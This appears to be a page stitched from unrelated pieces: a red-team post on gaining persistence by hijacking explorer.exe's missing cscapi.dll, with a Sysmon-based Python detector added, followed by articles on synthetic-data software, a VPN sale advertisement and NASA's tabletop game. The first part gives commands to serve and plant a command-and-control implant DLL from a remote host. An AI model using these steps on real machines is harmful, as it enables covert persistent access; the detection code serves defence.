March 5, 2024

Persistence – Explorer

Windows File Explorer is the graphical file management utility for the Windows operating system and the default desktop environment. Windows Explorer was introduced in Windows 95 and is associated with the process explorer.exe. Since this is a native Windows process, it could be used in red team operations for injection of arbitrary code. Processes that are missing DLLs are prone to DLL hijacking. Identifying missing DLLs is trivial: filter Process Monitor on explorer.exe for results that contain NAME NOT FOUND. One of the DLLs that explorer.exe fails to find is cscapi.dll.

Process Monitor – cscapi.dll

An HTTP server is required to serve the arbitrary DLL. From a Kali Linux box this is trivial by executing the following command:

python3 -m http.server 8080
Python Web Server

A public tool has been released that communicates with the host serving the arbitrary DLL, then retrieves the DLL and writes it into the C:\Windows path. The tool requires the IP address and port of the server hosting the DLL, and the DLL name.

DLLHijacking.exe 10.0.0.3 8080 demon.x64.dll
Explorer.exe – DLL Hijacking
Explorer.exe – cscapi.dll

The arbitrary DLL will load into the explorer.exe process on the next reboot, and a communication channel with the Command and Control will be established.

Explorer.exe – Implant
Host Enumeration
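
Added detection example (not part of the original post or of the referenced tool): the genuine cscapi.dll ships in C:\Windows\System32, so a DLL written directly into C:\Windows, and explorer.exe loading a DLL from its own directory, are the two events worth alerting on. It assumes Sysmon FileCreate (Event ID 11) and ImageLoad (Event ID 7) records exported as JSON lines; the sample events, the tool's directory and the finding labels are constructed.

```python
import json
import ntpath

# Constructed Sysmon-style records, one JSON object per line.
# Event ID 11 = FileCreate, Event ID 7 = ImageLoad. Paths and values are made up.
SAMPLE_EVENTS = r"""
{"EventID": 11, "Image": "C:\\Users\\Public\\DLLHijacking.exe", "TargetFilename": "C:\\Windows\\cscapi.dll"}
{"EventID": 11, "Image": "C:\\Windows\\System32\\svchost.exe", "TargetFilename": "C:\\Windows\\Temp\\update.dll"}
{"EventID": 7, "Image": "C:\\Windows\\explorer.exe", "ImageLoaded": "C:\\Windows\\System32\\shell32.dll", "Signed": "true"}
{"EventID": 7, "Image": "C:\\Windows\\explorer.exe", "ImageLoaded": "C:\\Windows\\cscapi.dll", "Signed": "false"}
"""

EXPLORER = r"c:\windows\explorer.exe"
APP_DIR = r"c:\windows"  # explorer.exe's own directory, searched before System32


def is_dll_in_app_dir(path):
    # True for a .dll sitting directly in C:\Windows, not in a subdirectory.
    p = path.lower()
    return ntpath.dirname(p) == APP_DIR and p.endswith(".dll")


def find_hijack_indicators(log_text):
    """Return (label, dll_path, detail) tuples for suspicious events."""
    findings = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        if ev["EventID"] == 11 and is_dll_in_app_dir(ev["TargetFilename"]):
            # Any process dropping a DLL next to explorer.exe
            findings.append(("dll_written_to_app_dir", ev["TargetFilename"], ev["Image"]))
        elif (ev["EventID"] == 7 and ev["Image"].lower() == EXPLORER
              and is_dll_in_app_dir(ev["ImageLoaded"])):
            # explorer.exe resolving a DLL from C:\Windows instead of System32
            findings.append(("explorer_loaded_app_dir_dll", ev["ImageLoaded"],
                             "signed=" + ev.get("Signed", "unknown")))
    return findings


if __name__ == "__main__":
    for finding in find_hijack_indicators(SAMPLE_EVENTS):
        print(finding)
```

On a real host, baseline any DLLs that legitimately sit in C:\Windows before alerting, and treat an unsigned load as the higher-priority signal.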

References

  1. https://github.com/gavz/ExplorerPersist


Using generative AI to improve software testing

Generative AI is getting plenty of attention for its ability to create text and images. But those media represent only a fraction of the data that proliferate in our society today. Data are generated every time a patient goes through a medical system, a storm impacts a flight, or a person interacts with a software application.

Using generative AI to create realistic synthetic data around those scenarios can help organizations more effectively treat patients, reroute planes, or improve software platforms — especially in scenarios where real-world data are limited or sensitive.

For the last three years, the MIT spinout DataCebo has offered a generative software system called the Synthetic Data Vault to help organizations create synthetic data to do things like test software applications and train machine learning models.

The Synthetic Data Vault, or SDV, has been downloaded more than 1 million times, with more than 10,000 data scientists using the open-source library for generating synthetic tabular data. The founders — Principal Research Scientist Kalyan Veeramachaneni and alumna Neha Patki ’15, SM ’16 — believe the company’s success is due to SDV’s ability to revolutionize software testing.

SDV goes viral

In 2016, Veeramachaneni’s group in the Data to AI Lab unveiled a suite of open-source generative AI tools to help organizations create synthetic data that matched the statistical properties of real data.

Companies can use synthetic data instead of sensitive information in programs while still preserving the statistical relationships between datapoints. Companies can also use synthetic data to run new software through simulations to see how it performs before releasing it to the public.

Veeramachaneni’s group came across the problem because it was working with companies that wanted to share their data for research.

“MIT helps you see all these different use cases,” Patki explains. “You work with finance companies and health care companies, and all those projects are useful to formulate solutions across industries.”

In 2020, the researchers founded DataCebo to build more SDV features for larger organizations. Since then, the use cases have been as impressive as they’ve been varied.

With DataCebo’s new flight simulator, for instance, airlines can plan for rare weather events in a way that would be impossible using only historic data. In another application, SDV users synthesized medical records to predict health outcomes for patients with cystic fibrosis. A team from Norway recently used SDV to create synthetic student data to evaluate whether various admissions policies were meritocratic and free from bias.

In 2021, the data science platform Kaggle hosted a competition for data scientists that used SDV to create synthetic data sets to avoid using proprietary data. Roughly 30,000 data scientists participated, building solutions and predicting outcomes based on the company’s realistic data.

And as DataCebo has grown, it’s stayed true to its MIT roots: All of the company’s current employees are MIT alumni.

Supercharging software testing

Although their open-source tools are being used for a variety of use cases, the company is focused on growing its traction in software testing.

“You need data to test these software applications,” Veeramachaneni says. “Traditionally, developers manually write scripts to create synthetic data. With generative models, created using SDV, you can learn from a sample of data collected and then sample a large volume of synthetic data (which has the same properties as real data), or create specific scenarios and edge cases, and use the data to test your application.”

For example, if a bank wanted to test a program designed to reject transfers from accounts with no money in them, it would have to simulate many accounts simultaneously transacting. Doing that with data created manually would take a lot of time. With DataCebo’s generative models, customers can create any edge case they want to test.

“It’s common for industries to have data that is sensitive in some capacity,” Patki says. “Often when you’re in a domain with sensitive data you’re dealing with regulations, and even if there aren’t legal regulations, it’s in companies’ best interest to be diligent about who gets access to what at which time. So, synthetic data is always better from a privacy perspective.”

Scaling synthetic data

Veeramachaneni believes DataCebo is advancing the field of what it calls synthetic enterprise data, or data generated from user behavior on large companies’ software applications.

“Enterprise data of this kind is complex, and there is no universal availability of it, unlike language data,” Veeramachaneni says. “When folks use our publicly available software and report back if it works on a certain pattern, we learn a lot of these unique patterns, and it allows us to improve our algorithms. From one perspective, we are building a corpus of these complex patterns, which for language and images is readily available.”

DataCebo also recently released features to improve SDV’s usefulness, including tools to assess the “realism” of the generated data, called the SDMetrics library, as well as a way to compare models’ performances called SDGym.

“It’s about ensuring organizations trust this new data,” Veeramachaneni says. “[Our tools offer] programmable synthetic data, which means we allow enterprises to insert their specific insight and intuition to build more transparent models.”

As companies in every industry rush to adopt AI and other data science tools, DataCebo is ultimately helping them do so in a way that is more transparent and responsible.

“In the next few years, synthetic data from generative models will transform all data work,” Veeramachaneni says. “We believe 90 percent of enterprise operations can be done with synthetic data.”


A lifetime subscription to this reliable VPN is on sale for under £60

TL;DR: A lifetime subscription to VPN Unlimited is on sale for £55.24, saving you 65% on list price.


Do you have beefing up your online security on your list of 2024 resolutions? If so, it may be time to invest in a good VPN. And the timing couldn’t be better — as you can currently get your hands on a lifetime subscription to one of the most trusted virtual private networks, VPN Unlimited, for the best price online right here. 

With VPN Unlimited, you can take action to keep your online activities safe and secure on all your different devices. For a limited time, you can get this lifetime subscription for just £55.24 — the best price on the web and around £100 off the usual cost. 

As much as we’d love to ditch the internet sometimes, it’s just not possible these days. That means securing yourself online is more important than ever, and VPN Unlimited makes it super easy. Their top-notch encryption algorithms help defend you from hacking or data compromisation, while you can also rest easy knowing you are browsing with complete anonymity, thanks to VPN Unlimited’s privacy safeguards. 

VPN Unlimited offers 3,000 secure servers with more than 80 global locations to hide your IP address and keep you safe from cybercriminals. That variety of locations also comes with the added perk of being able to browse the web without restrictions or borders — which means you can watch content from anywhere, no matter where you are. And this lifetime subscription means you pay once to enjoy all these benefits forever, with wide compatibility for all of your devices. 

Stay secure online with a lifetime subscription to VPN Unlimited for just £55.24 for a limited time. 


NASA Really Made Its Own Tabletop RPG for You to Play

The Lost Universe gameplay instructional booklet art

NASA still has plenty of cool projects afoot in the real world—did you hear about that asteroid-redirecting test? Or those space-friendly cameras?—but it’s also trying to stir imaginations in fantastically creative ways, too. Enter The Lost Universe, the agency’s first-ever tabletop roleplaying game.

Its first what now? Yes, a TTRPG crafted at NASA’s Goddard Space Flight Center, with a gameplay instructional booklet currently available for free download here (plus a Tolkien-esque map); it’s for 4-7 level 7-10 characters, and is touted as being compatible with whichever game system you prefer for gathering parties and venturing forth. Here’s the pitch: “A dark mystery has settled over the city of Aldastron on the rogue planet of Exlaris. Researchers dedicated to studying the cosmos have disappeared, and the Hubble Space Telescope has vanished from Earth’s timeline. Only an ambitious crew of adventurers can uncover what was lost. Are you up to the challenge?”

There’s an educational element lurking here—“take on a classic villain (while also using and learning science skills!) as you overcome challenges and embark on an exciting quest to unlock more knowledge about our universe”—which feels both obvious as well as something that cleverly exploits the Venn diagram encompassing “TTRPG fans” and “science lovers.” Which is to say, a lot of folks!

NASA shared a video for added excitement, which you can see below. Will you be blasting off to The Lost Universe?

Welcome to The Lost Universe: NASA’s First Tabletop Role-playing Game

